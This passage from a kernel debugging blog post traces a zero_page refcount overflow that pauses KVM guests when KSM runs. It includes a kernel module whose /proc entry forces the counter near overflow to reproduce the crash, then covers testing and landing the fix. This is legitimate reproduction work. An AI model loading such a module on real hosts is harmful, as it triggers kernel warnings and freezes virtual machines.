<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>crash> x/gx empty_zero_page
0xffffffff9c2ec000: 0x0000000000000000
</code></pre></div></div>
<p>The memory address is <code class="language-plaintext highlighter-rouge">0xffffffff9c2ec000</code>, and the pointer points to zero,
which would be the first element of the zero page, which makes sense.</p>
<p>The next thing to do, is to try and get the populated <code class="language-plaintext highlighter-rouge">struct page</code> for
<code class="language-plaintext highlighter-rouge">empty_zero_page</code>.</p>
<p>It turns out that its pretty easy in crash, we can use <code class="language-plaintext highlighter-rouge">kmem</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>crash> kmem 0xffffffff9c2ec000
ffffffff9c2ec000 (b) .bss
PAGE PHYSICAL MAPPING INDEX CNT FLAGS
ffffd85a125e3b00 4978ec000 0 0 3518835 17ffffc0000800 reserved
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">CNT</code> variable is the reference counter for the page struct. In this case,
its only 3518835, which is pretty low. It will take months for this to reach
~2.5 billion and overflow.</p>
<p>In the meantime, if we run the <code class="language-plaintext highlighter-rouge">kmem</code> command a few more times:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>crash> kmem 0xffffffff9c2ec000
ffffffff9c2ec000 (b) .bss
PAGE PHYSICAL MAPPING INDEX CNT FLAGS
ffffd85a125e3b00 4978ec000 0 0 3525496 17ffffc0000804 referenced,reserved
crash> kmem 0xffffffff9c2ec000
ffffffff9c2ec000 (b) .bss
PAGE PHYSICAL MAPPING INDEX CNT FLAGS
ffffd85a125e3b00 4978ec000 0 0 3546258 17ffffc0000804 referenced,reserved
</code></pre></div></div>
<p>We can see <code class="language-plaintext highlighter-rouge">CNT</code> increase from 3518835 -> 3525496 -> 3546258. It is steadily
increasing, and never gets smaller. So we can see buggy behaviour, but we
can’t reproduce the failure just yet.</p>
<h1 id="working-smarter-and-reproducing-by-writing-a-kernel-module">Working Smarter and Reproducing by Writing a Kernel Module</h1>
<p>Okay, so we need a way to be able to reproduce the problem faster than just
waiting for it to happen. In this case, we are going to write a kernel module
to read, and hopefully set the value of the reference counter of the <code class="language-plaintext highlighter-rouge">zero_page</code>.</p>
<p>One of my colleagues told me that I can get the page struct for the <code class="language-plaintext highlighter-rouge">zero_page</code>
by calling <code class="language-plaintext highlighter-rouge">virt_to_page()</code> and passing in <code class="language-plaintext highlighter-rouge">empty_zero_page</code>. This is useful,
as the reference counter is the <code class="language-plaintext highlighter-rouge">_refcount</code> member, as shown below:</p>
<p>If we look at <code class="language-plaintext highlighter-rouge">include/linux/mm_types.h</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">42</span> <span class="k">struct</span> <span class="n">page</span> <span class="p">{</span>
<span class="p">...</span>
<span class="mi">81</span> <span class="k">struct</span> <span class="p">{</span>
<span class="mi">82</span>
<span class="mi">83</span> <span class="k">union</span> <span class="p">{</span>
<span class="mi">84</span> <span class="cm">/*
85 * Count of ptes mapped in mms, to show when
86 * page is mapped & limit reverse map searches.
87 *
88 * Extra information about page type may be
89 * stored here for pages that are never mapped,
90 * in which case the value MUST BE <= -2.
91 * See page-flags.h for more details.
92 */</span>
<span class="mi">93</span> <span class="n">atomic_t</span> <span class="n">_mapcount</span><span class="p">;</span>
<span class="mi">94</span>
<span class="mi">95</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">active</span><span class="p">;</span> <span class="cm">/* SLAB */</span>
<span class="mi">96</span> <span class="k">struct</span> <span class="p">{</span> <span class="cm">/* SLUB */</span>
<span class="mi">97</span> <span class="kt">unsigned</span> <span class="n">inuse</span><span class="o">:</span><span class="mi">16</span><span class="p">;</span>
<span class="mi">98</span> <span class="kt">unsigned</span> <span class="n">objects</span><span class="o">:</span><span class="mi">15</span><span class="p">;</span>
<span class="mi">99</span> <span class="kt">unsigned</span> <span class="n">frozen</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>
<span class="mi">100</span> <span class="p">};</span>
<span class="mi">101</span> <span class="kt">int</span> <span class="n">units</span><span class="p">;</span> <span class="cm">/* SLOB */</span>
<span class="mi">102</span> <span class="p">};</span>
<span class="mi">103</span> <span class="cm">/*
104 * Usage count, *USE WRAPPER FUNCTION* when manual
105 * accounting. See page_ref.h
106 */</span>
<span class="mi">107</span> <span class="n">atomic_t</span> <span class="n">_refcount</span><span class="p">;</span>
<span class="mi">108</span> <span class="p">};</span>
<span class="mi">109</span> <span class="p">};</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">_refcount</code> is what we are interested in, since if we remember back to
<code class="language-plaintext highlighter-rouge">try_get_page()</code> and its call to <code class="language-plaintext highlighter-rouge">if (WARN_ON_ONCE(page_ref_count(page) <= 0))</code>,
we can look at the implementation of <code class="language-plaintext highlighter-rouge">page_ref_count()</code> in <code class="language-plaintext highlighter-rouge">include/linux/page_ref.h</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">65</span> <span class="k">static</span> <span class="kr">inline</span> <span class="kt">int</span> <span class="nf">page_ref_count</span><span class="p">(</span><span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span><span class="p">)</span>
<span class="mi">66</span> <span class="p">{</span>
<span class="mi">67</span> <span class="k">return</span> <span class="n">atomic_read</span><span class="p">(</span><span class="o">&</span><span class="n">page</span><span class="o">-></span><span class="n">_refcount</span><span class="p">);</span>
<span class="mi">68</span> <span class="err">}</span>
</code></pre></div></div>
<p>This just does a <code class="language-plaintext highlighter-rouge">atomic_read()</code> on <code class="language-plaintext highlighter-rouge">page struct -> _refcount</code>.</p>
<p>Good! Let’s write a kernel module which exposes a <code class="language-plaintext highlighter-rouge">/proc</code> interface which we
can read from, to see the current value of the <code class="language-plaintext highlighter-rouge">zero_page</code> reference counter:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
* zero_page_refcount.c - view zero_page reference counter in real time
* with the proc filesystem.
*
* Author: Matthew Ruffell <matthew.ruffell@canonical.com>
*
* Steps:
*
* $ sudo apt-get -y install gcc make libelf-dev linux-headers-$(uname -r)
*
* cat <<EOF >Makefile
obj-m=zero_page_refcount.o
KVER=\$(shell uname -r)
MDIR=\$(shell pwd)
default:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) modules
clean:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) clean
EOF
*
* $ make
* $ sudo insmod zero_page_refcount.ko
* # To display current zero_page reference count:
* $ cat /proc/zero_page_refcount
*/</span>
<span class="cp">#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
</span>
<span class="cp">#include <linux/atomic.h>
#include <asm/pgtable.h>
</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_show</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span> <span class="o">=</span> <span class="n">virt_to_page</span><span class="p">(</span><span class="n">empty_zero_page</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">reference_count</span> <span class="o">=</span> <span class="n">atomic_read</span><span class="p">(</span><span class="o">&</span><span class="n">page</span><span class="o">-></span><span class="n">_refcount</span><span class="p">);</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Zero Page Refcount: 0x%x or %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">reference_count</span><span class="p">,</span> <span class="n">reference_count</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_open</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="n">single_open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">zero_page_refcount_show</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span> <span class="n">zero_page_refcount_fops</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">owner</span> <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">.</span><span class="n">open</span> <span class="o">=</span> <span class="n">zero_page_refcount_open</span><span class="p">,</span>
<span class="p">.</span><span class="n">read</span> <span class="o">=</span> <span class="n">seq_read</span><span class="p">,</span>
<span class="p">.</span><span class="n">llseek</span> <span class="o">=</span> <span class="n">seq_lseek</span><span class="p">,</span>
<span class="p">.</span><span class="n">release</span> <span class="o">=</span> <span class="n">single_release</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">static</span> <span class="kt">int</span> <span class="n">__init</span> <span class="nf">zero_page_refcount_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="n">proc_create</span><span class="p">(</span><span class="s">"zero_page_refcount"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">zero_page_refcount_fops</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">void</span> <span class="n">__exit</span> <span class="nf">zero_page_refcount_exit</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="n">remove_proc_entry</span><span class="p">(</span><span class="s">"zero_page_refcount"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">MODULE_LICENSE</span><span class="p">(</span><span class="s">"GPL"</span><span class="p">);</span>
<span class="n">module_init</span><span class="p">(</span><span class="n">zero_page_refcount_init</span><span class="p">);</span>
<span class="n">module_exit</span><span class="p">(</span><span class="n">zero_page_refcount_exit</span><span class="p">);</span>
</code></pre></div></div>
<p>The module is pretty simple, we register a <code class="language-plaintext highlighter-rouge">/proc</code> interface called
<code class="language-plaintext highlighter-rouge">/proc/zero_page_refcount</code>, which is read-only. It calls the module function
<code class="language-plaintext highlighter-rouge">zero_page_refcount_show()</code>, which uses <code class="language-plaintext highlighter-rouge">virt_to_page(empty_zero_page)</code> to get
the page struct for the zero page, we do an <code class="language-plaintext highlighter-rouge">atomic_read(&page->_refcount)</code>
to get the reference counter, and we then print it out. Easy as.</p>
<p>If you compile it with the following <code class="language-plaintext highlighter-rouge">Makefile</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m=zero_page_refcount.o
KVER=\$(shell uname -r)
MDIR=\$(shell pwd)
default:
make -C /lib/modules/\$(KVER)/build M=\$(MDIR) modules
clean:
make -C /lib/modules/\$(KVER)/build M=\$(MDIR) clean
</code></pre></div></div>
<p>with:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>make
<span class="nv">$ </span><span class="nb">sudo </span>insmod zero_page_refcount.ko
</code></pre></div></div>
<p>From there we can run it with:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x687 or 1671
</code></pre></div></div>
<p>If we run it a few times, we can see it increment.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x687 or 1671
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x846 or 2118
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x9f8 or 2552
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0xcb2 or 3250
</code></pre></div></div>
<p>Okay, so our kernel module works. Now, we can go about writing a function to
set the value of the reference counter. I just added another <code class="language-plaintext highlighter-rouge">/proc</code> interface,
called <code class="language-plaintext highlighter-rouge">/proc/zero_page_refcount_set</code> which uses <code class="language-plaintext highlighter-rouge">virt_to_page(empty_zero_page)</code>
to get the page struct, and <code class="language-plaintext highlighter-rouge">atomic_set(&page->_refcount, 0xFFFF7FFFFF00)</code> to
set it near overflow.</p>
<p>The complete module is below:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
* zero_page_refcount.c - view zero_page reference counter in real time
* with the proc filesystem.
*
* Author: Matthew Ruffell <matthew.ruffell@canonical.com>
*
* Steps:
*
* $ sudo apt-get -y install gcc make libelf-dev linux-headers-$(uname -r)
*
* cat <<EOF >Makefile
obj-m=zero_page_refcount.o
KVER=\$(shell uname -r)
MDIR=\$(shell pwd)
default:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) modules
clean:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) clean
EOF
*
* $ make
* $ sudo insmod zero_page_refcount.ko
* # To display current zero_page reference count:
* $ cat /proc/zero_page_refcount
* # To set zero_page reference count to near overflow:
* $ cat /proc/zero_page_refcount_set
*/</span>
<span class="cp">#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
</span>
<span class="cp">#include <linux/atomic.h>
#include <asm/pgtable.h>
</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_show_set</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span> <span class="o">=</span> <span class="n">virt_to_page</span><span class="p">(</span><span class="n">empty_zero_page</span><span class="p">);</span>
<span class="n">atomic_set</span><span class="p">(</span><span class="o">&</span><span class="n">page</span><span class="o">-></span><span class="n">_refcount</span><span class="p">,</span> <span class="mh">0xFFFF7FFFFF00</span><span class="p">);</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Zero Page Refcount set to 0x1FFFFFFFFF000</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_open_set</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="n">single_open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">zero_page_refcount_show_set</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span> <span class="n">zero_page_refcount_set_fops</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">owner</span> <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">.</span><span class="n">open</span> <span class="o">=</span> <span class="n">zero_page_refcount_open_set</span><span class="p">,</span>
<span class="p">.</span><span class="n">read</span> <span class="o">=</span> <span class="n">seq_read</span><span class="p">,</span>
<span class="p">.</span><span class="n">llseek</span> <span class="o">=</span> <span class="n">seq_lseek</span><span class="p">,</span>
<span class="p">.</span><span class="n">release</span> <span class="o">=</span> <span class="n">single_release</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_show</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span> <span class="o">=</span> <span class="n">virt_to_page</span><span class="p">(</span><span class="n">empty_zero_page</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">reference_count</span> <span class="o">=</span> <span class="n">atomic_read</span><span class="p">(</span><span class="o">&</span><span class="n">page</span><span class="o">-></span><span class="n">_refcount</span><span class="p">);</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Zero Page Refcount: 0x%x or %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">reference_count</span><span class="p">,</span> <span class="n">reference_count</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_open</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="n">single_open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">zero_page_refcount_show</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span> <span class="n">zero_page_refcount_fops</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">owner</span> <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">.</span><span class="n">open</span> <span class="o">=</span> <span class="n">zero_page_refcount_open</span><span class="p">,</span>
<span class="p">.</span><span class="n">read</span> <span class="o">=</span> <span class="n">seq_read</span><span class="p">,</span>
<span class="p">.</span><span class="n">llseek</span> <span class="o">=</span> <span class="n">seq_lseek</span><span class="p">,</span>
<span class="p">.</span><span class="n">release</span> <span class="o">=</span> <span class="n">single_release</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">static</span> <span class="kt">int</span> <span class="n">__init</span> <span class="nf">zero_page_refcount_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="n">proc_create</span><span class="p">(</span><span class="s">"zero_page_refcount"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">zero_page_refcount_fops</span><span class="p">);</span>
<span class="n">proc_create</span><span class="p">(</span><span class="s">"zero_page_refcount_set"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">zero_page_refcount_set_fops</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">void</span> <span class="n">__exit</span> <span class="nf">zero_page_refcount_exit</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="n">remove_proc_entry</span><span class="p">(</span><span class="s">"zero_page_refcount"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="n">remove_proc_entry</span><span class="p">(</span><span class="s">"zero_page_refcount_set"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">MODULE_LICENSE</span><span class="p">(</span><span class="s">"GPL"</span><span class="p">);</span>
<span class="n">module_init</span><span class="p">(</span><span class="n">zero_page_refcount_init</span><span class="p">);</span>
<span class="n">module_exit</span><span class="p">(</span><span class="n">zero_page_refcount_exit</span><span class="p">);</span>
</code></pre></div></div>
<p>You can download the completed module <a href="/assets/bin/zero_page_refcount.c">here</a>.</p>
<p>This time, if we build and insert it to the running kernel, we can set the
reference counter to near overflow:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount_set
Zero Page Refcount <span class="nb">set </span>to 0x1FFFFFFFFF000
</code></pre></div></div>
<p>After that, we can watch it overflow:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x7fffff16 or 2147483414
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x80000000 or <span class="nt">-2147483648</span>
</code></pre></div></div>
<p>See that? It wrapped around from 2147483414 to -2147483648! That’s a signed
integer overflow.</p>
<p>If we check the status of our virtual machines, still running in that infinite
script, we see they are now paused:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ virsh list
Id Name State
----------------------------------------------------
1 instance-0 paused
2 instance-1 paused
</code></pre></div></div>
<p>If we check dmesg, we see the exact same kernel oops:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 167.695986] WARNING: CPU: 1 PID: 3016 at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/include/linux/mm.h:852 follow_page_pte+0x6f4/0x710
[ 167.696023] CPU: 1 PID: 3016 Comm: CPU 0/KVM Tainted: G OE 4.15.0-106-generic #107~16.04.1-Ubuntu
[ 167.696023] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1 04/01/2014
[ 167.696025] RIP: 0010:follow_page_pte+0x6f4/0x710
[ 167.696026] RSP: 0018:ffffa81802023908 EFLAGS: 00010286
[ 167.696027] RAX: ffffed8786e33a80 RBX: ffffed878c6d21b0 RCX: 0000000080000000
[ 167.696027] RDX: 0000000000000000 RSI: 00003ffffffff000 RDI: 80000001b8cea225
[ 167.696028] RBP: ffffa81802023970 R08: 80000001b8cea225 R09: ffff90c4d55fa340
[ 167.696028] R10: 0000000000000000 R11: 0000000000000000 R12: ffffed8786e33a80
[ 167.696029] R13: 0000000000000326 R14: ffff90c4db94fc50 R15: ffff90c4d55fa340
[ 167.696030] FS: 00007f6a7798c700(0000) GS:ffff90c4edc80000(0000) knlGS:0000000000000000
[ 167.696030] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 167.696031] CR2: 0000000000000000 CR3: 0000000315580002 CR4: 0000000000162ee0
[ 167.696033] Call Trace:
[ 167.696047] follow_pmd_mask+0x273/0x630
[ 167.696049] follow_page_mask+0x178/0x230
[ 167.696051] __get_user_pages+0xb8/0x740
[ 167.696052] get_user_pages+0x42/0x50
[ 167.696068] __gfn_to_pfn_memslot+0x18b/0x3b0 [kvm]
[ 167.696079] ? mmu_set_spte+0x1dd/0x3a0 [kvm]
[ 167.696090] try_async_pf+0x66/0x220 [kvm]
[ 167.696101] tdp_page_fault+0x14b/0x2b0 [kvm]
[ 167.696104] ? vmexit_fill_RSB+0x10/0x40 [kvm_intel]
[ 167.696114] kvm_mmu_page_fault+0x62/0x180 [kvm]
[ 167.696117] handle_ept_violation+0xbc/0x160 [kvm_intel]
[ 167.696119] vmx_handle_exit+0xa5/0x580 [kvm_intel]
[ 167.696129] vcpu_enter_guest+0x414/0x1260 [kvm]
[ 167.696138] ? kvm_arch_vcpu_load+0x4d/0x280 [kvm]
[ 167.696148] kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[ 167.696157] ? kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[ 167.696165] kvm_vcpu_ioctl+0x33a/0x610 [kvm]
[ 167.696166] ? do_futex+0x129/0x590
[ 167.696171] ? __switch_to+0x34c/0x4e0
[ 167.696174] ? __switch_to_asm+0x35/0x70
[ 167.696176] do_vfs_ioctl+0xa4/0x600
[ 167.696177] SyS_ioctl+0x79/0x90
[ 167.696180] ? exit_to_usermode_loop+0xa5/0xd0
[ 167.696181] do_syscall_64+0x73/0x130
[ 167.696182] entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[ 167.696184] RIP: 0033:0x7f6a80482007
[ 167.696184] RSP: 002b:00007f6a7798b8b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[ 167.696185] RAX: ffffffffffffffda RBX: 000000000000ae80 RCX: 00007f6a80482007
[ 167.696185] RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000016
[ 167.696186] RBP: 000055fe135f3240 R08: 000055fe118be530 R09: 0000000000000001
[ 167.696186] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
[ 167.696187] R13: 00007f6a85852000 R14: 0000000000000000 R15: 000055fe135f3240
[ 167.696188] Code: 4d 63 e6 e9 f2 fc ff ff 4c 89 45 d0 48 8b 47 10 e8 22 f0 9e 00 4c 8b 45 d0 e9 89 fc ff ff 4c 89 e7 e8 81 3f fd ff e9 aa fc ff ff <0f> 0b 49 c7 c4 f4 ff ff ff e9 c1 fc ff ff 0f 1f 40 00 66 2e 0f
[ 167.696200] ---[ end trace 7573f6868ea8f069 ]---
</code></pre></div></div>
<p>The QEMU crash is the same as well. We can reproduce the problem!</p>
<h1 id="testing-the-test-kernel">Testing the test Kernel</h1>
<p>After that good news, I installed the test kernel which I built to the lab
machine.</p>
<p>After rebooting and recompiling the kernel module we made, I started the script
to create and destroy VMs and had a look at the reference counter:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x1 or 1
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x1 or 1
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x1 or 1
</code></pre></div></div>
<p>Interesting. The fix seems to keep the reference counter glued to 1. It never
changes, so it will never overflow. Looks good, it seems that the identified fix
really does fix the problem. That’s reassuring.</p>
<h1 id="landing-the-fix-in-the-kernel">Landing the Fix in the Kernel</h1>
<p>As with all kernel bugs, we need to follow the <a href="https://wiki.ubuntu.com/StableReleaseUpdates">Stable Release
Updates</a> procedure, and follow the
special <a href="https://wiki.ubuntu.com/KernelTeam/KernelUpdates">kernel specific rules</a>.</p>
<p>This involves opening a launchpad bug and filling out a SRU template:</p>
<ul>
<li><a href="https://bugs.launchpad.net/bugs/1837810">https://bugs.launchpad.net/bugs/1837810</a></li>
</ul>
<p>From there, I determined that the fixes needed to be landed in the 4.15 and
5.4 Ubuntu kernels, and I prepared patches to be submitted to the Ubuntu Kernel
Mailing list:</p>
<ul>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112749.html">Cover Letter</a></li>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112750.html">Patch</a></li>
</ul>
<p>After that, the patches get reviewed by senior members of the kernel team, and
require 2 acks from them before it is accepted into the next SRU cycle:</p>
<ul>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112772.html">ACK 1</a></li>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112775.html">ACK 2</a></li>
</ul>
<p>From there, the patches were applied to the 4.15 and 5.4 kernel git trees:</p>
<ul>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112974.html">Applied 4.15</a></li>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112844.html">Applied 5.4</a></li>
</ul>
<p>From there we can check what kernel versions this will be included in:</p>
<p>For the 4.15 kernel:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git log --grep "KVM: fix overflow of zero page refcount with ksm running"
commit 4047f81f064d45f9f7e1ae9cac9a000f37af714c
Author: Zhuang Yanying <ann.zhuangyanying@huawei.com>
Date: Mon Aug 17 11:51:54 2020 +1200
KVM: fix overflow of zero page refcount with ksm running
$ git describe --contains 4047f81f064d45f9f7e1ae9cac9a000f37af714c
Ubuntu-4.15.0-116.117~13
</code></pre></div></div>
<p>and the 5.4 kernel:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git log --grep "KVM: fix overflow of zero page refcount with ksm running"
commit 62f890e92628903a4fa2febd854edd12a0cea63a
Author: Zhuang Yanying <ann.zhuangyanying@huawei.com>
Date: Mon Aug 17 11:51:54 2020 +1200
KVM: fix overflow of zero page refcount with ksm running
$ git describe --contains 62f890e92628903a4fa2febd854edd12a0cea63a
Ubuntu-5.4.0-46.50~509
</code></pre></div></div>
<p>We are tagged in the 4.15.0-116-generic and 5.4.0-46-generic kernels. These
should be released to -updates within a few weeks of this blog post, then
everyone can get this problem fixed.</p>
<h1 id="conclusion">Conclusion</h1>
<p>That is how it’s done. We looked into a failure on an OpenStack compute node
which paused all of its virtual machines, and we debugged the problem down
to the kernel’s zero_page reference counter overflowing them Kernel Samepage
Mapping is enabled.</p>
<p>We did some detective work, and managed to reproduce the problem without having
to wait months for it to trigger, and managed to learn about writing a kernel
module to help with our debugging. Finally, we got the fix landed in the
Ubuntu kernels.</p>
<p>I hope you enjoyed the read, and as always, feel free to <a href="/about">contact me</a>.</p>
